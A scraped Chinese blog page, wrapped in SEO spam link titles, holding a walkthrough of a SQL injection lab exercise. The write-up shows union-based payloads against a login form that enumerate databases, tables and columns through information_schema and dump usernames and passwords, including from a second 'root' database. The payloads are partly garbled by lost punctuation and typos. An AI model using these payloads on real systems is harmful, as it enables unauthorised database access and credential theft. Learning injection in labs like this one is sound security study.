当前位置: 首页 > news >正文

网站开发设计流程图哪家做网站公司最好

网站开发设计流程图,哪家做网站公司最好,网站被spider重复抓取,wordpress使用百度分享插件下载知识点#xff1a; 发现登录框就可以尝试注入登录框一般都是字符型注入通过注入可以获取其他表的信息绕过手段 单引号闭合联合注入也可以进行错误注入 首先看界面是一个登录框#xff1b;通过admin admin登录进去#xff0c;发现页面会把用户名和密码的登录信息打印出来 发现登录框就可以尝试注入登录框一般都是字符型注入通过注入可以获取其他表的信息绕过手段 单引号闭合联合注入也可以进行错误注入 首先看界面是一个登录框通过admin admin登录进去发现页面会把用户名和密码的登录信息打印出来通过bp抓包进行测试是不是存在注入点 开始测试 构造payload:usernameaor11# 页面成功回显除了第一个用户名和密码说明这里存在字符型注入通过单引号闭合进行绕过 既然页面有回显可以尝试进行联合注入尝试先用3个字段前几关的经验 构造payload:usernameaunoionselect1,2,3# 提示字段数不对根据页面返回情况猜测是两个字段 构造payload:usernameaunionselect1,2# 页面成功回显除了输入的信息说明注入成功下面可以进行数据库敏感信息的获取了 联合注入成功获取数据库名 构造payload:usernameaunionselect1,database()# 成功获取了数据库名 接下来获取数据库下的表名 构造payload:usernameaunionselect1,group_concat(table_name)frominformation_schema.tableswheretable_schemasecurity# 成功获取了security下的表名 接下来获取users表中的所有字段名 构造payload:usernameaunionselect1,group_concat(column_name)frominformation_schema.columnswheretable_schemasecurityandtable_nameusers# 成功获取了相关的字段发现里面有用户名和密码 接下来获取相关的数据信息用户名和密码 构造payload:usernameaunionselect1,group_concat(username,:,password)fromusers# 这里直接用users表名了因为当前默认使用的数据库是security所有加不加都可以如果不知道的情况下最好加上如security.users 成功获取了用户的敏感信息 到这里其实就完成了不需要在进行其他操作了但是我想测一下是不是能够读取其他数据库的信息 番外 接着进行操作获取所有数据库名 构造payload:usernameagroup_concat(schema_name)frominformation_schema.schemata# 成功获取了所有的数据库信息发现了一个root数据库 尝试获取root数据库的表名 构造payload:usernameaunionselect1,group_concat(table_name)frominformation_schema.tableswheretable_securityroot# 成功获取了所有的表名发现有一个用户表 尝试读取users表的字段信息 构造payload:usernameaunionselect1,group_concat(column_name)frominformation_schema.tableswheretable_schemarootandtable_nameusers# 成功获取users表中的字段信息 发现存在用户名和密码的字段 接下来对用户名和密码进行读取 构造payload:usernameaunionselect1,grroup_concat(user,:,password)fromroot.users# 这里就要指定数据库了因为默认是security数据库通过指定root.users 成功获取了root表中的所有用户信息可以看出密码进行加密了 到这里就真的结束了真实畅快啊 10
http://www.zqtcl.cn/news/590456/

相关文章:

  • 网站关键词怎么优化排名wordpress电子商城模板
  • 电子商务网站建设与维护能赚多少钱成交型网站建设
  • 到国外做网站网站是怎么回事中国一级建造师网官网
  • 惠州网站建设哪家好网站对图片优化
  • 酒店网站建设报价详情wordpress表单留言
  • 58同城做公司网站怎修改在线葡京在线葡京
  • 家纺网站模板wordpress折叠菜单
  • 建设信用中国网站站群系统破解版
  • 百度怎么投放广告凡科网站可以做seo优化
  • 医院网站建设 不足好的手机网站建设公司
  • 简历上作品展示网站链接怎么做wordpress的登陆地址修改密码
  • 深圳做响应式网站公司公司网站开发费用放在什么科目
  • 网站页面上的悬浮窗怎么做简单好看的版面设计图
  • 我要在58上面做网站硬件开发和嵌入式的区别
  • 西安网站推广慧创新手怎么开网店
  • 做羞羞事视频网站网站策划书基本项目
  • 对网站建设的维护优秀设计网站推荐
  • 口红机网站怎么做wordpress 搭建个人网站
  • 黄金网站房地产网站建设意义
  • 百度网站联盟公司做网站计入那个科目
  • 越秀电子商务网站建设国外的ui设计思想网站
  • 网站关键词优化公司网站建设完成确认书
  • 企业微信网站怎么建设山东有哪些网络公司
  • 做任务领佣金的网站源码页面设计参评
  • 淘宝联盟个人网站怎么做企业年度报告公示系统
  • 长沙企业网页设计哪家专业网站优化seo
  • 网站设计 西安漂亮企业网站源码
  • 云南省科技网站网页设计师有前途吗
  • 漳州网站开发找出博大科技慈溪市建设局网站表格下载
  • 网站到期怎么续费公司网站asp源码